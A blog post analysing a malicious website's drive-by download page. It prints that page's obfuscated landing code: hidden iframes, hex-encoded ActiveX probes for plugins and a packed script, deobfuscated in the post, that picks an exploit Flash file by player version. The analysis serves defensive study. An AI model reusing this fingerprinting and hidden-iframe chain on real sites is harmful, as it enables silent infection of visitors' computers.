www.maigol.cn/index.htm

This is a partial analysis of the malicious site.

Content of index.htm

<script>
window.status="完成";
window.onerror=function(){return true;}
if(navigator.userAgent.toLowerCase().indexOf("msie 7")==-1)
document.write("<iframe width=20 height=0 src=14.htm></iframe>");
document.write("<iframe width=20 height=0 src=re10.htm></iframe>");
document.write("<iframe width=20 height=0 src=flash.htm></iframe>");
try{var f;
var gw=new ActiveXObject("\x47\x4c\x49\x45\x44\x6f\x77\x6e\x2e\x49\x45\x44\x6f\x77\x6e\x2e\x31");}
catch(f){};
finally{if(f!="[object Error]"){document.write("<iframe width=100 height=0 src=lz.htm></iframe>");}}
try{var m;
var ww=new ActiveXObject("\x49\x45\x52\x50\x43\x74\x6C\x2E\x49\x45\x52\x50\x43\x74\x6C\x2E\x31");}
catch(m){};
finally{if(m!="[object Error]"){document.write("<iframe width=100 height=0 src=re11.htm></iframe>");}}
</script>

at first glance, we can deduce it tries to exploit plugins such as real, swf and others.

flash.htm calls ilink.html and flink.html

Content of flink.html

<script type="text/javascript" src="swfobject.js"></script>
<div id="flashcontent">111</div><div id="flashversion">222</div>
<script type="text/javascript">
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))
+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);
k=[function(e){return d[e]}];
e=function(){return'\\w+'};c=1};
while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);
return p}('6 4=A.z.y();3(4[\'x\']==9){h.g(\'j\').i=""; 3(4[\'5\']==w)
{6 2=f e("./v.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==u){6 2=f e("./t.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==s){6 2=f e("./r.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==q){6 2=f e("./p.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==o){6 2=f e("./n.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']==m){6 2=f e("./l.d","c","0.1","0.1","9","#b");
2.a("8")}7 3(4[\'5\']>=k){3(h.g){h.g(\'j\').i=""}}}',37,37,'||so|if|version|rev|var|else|flashcontent||
write|000000|mymovie|swf|SWFObject|new|getElementById|document|
innerHTML|flashversion|124|f16|16|f28|28|f45|45|f47|47|f64|64|f115|115|
major|getPlayerVersion|SWFObjectUtil|deconcept'.split('|'),0,{}));
document.write("")</script>

It is interesting to note that a tool like swfobject (v1.5.1)is used. The obfuscated function essentially uses the swfobject code to check the flash player version to get the respective exploit, code as follows:

var version=deconcept.SWFObjectUtil.getPlayerVersion();
if(version['major']==9){document.getElementById('flashversion').innerHTML="";
if(version['rev']==115){var so=new SWFObject("./f115.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==64){var so=new SWFObject("./f64.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==47){var so=new SWFObject("./f47.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==45){var so=new SWFObject("./f45.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==28){var so=new SWFObject("./f28.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']==16){var so=new SWFObject("./f16.swf","mymovie","0.1","0.1","9","#000000");
so.write("flashcontent")}else 
if(version['rev']>=124){if(document.getElementById)
{document.getElementById('flashversion').innerHTML=""}}}

Advertisements

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s

%d bloggers like this: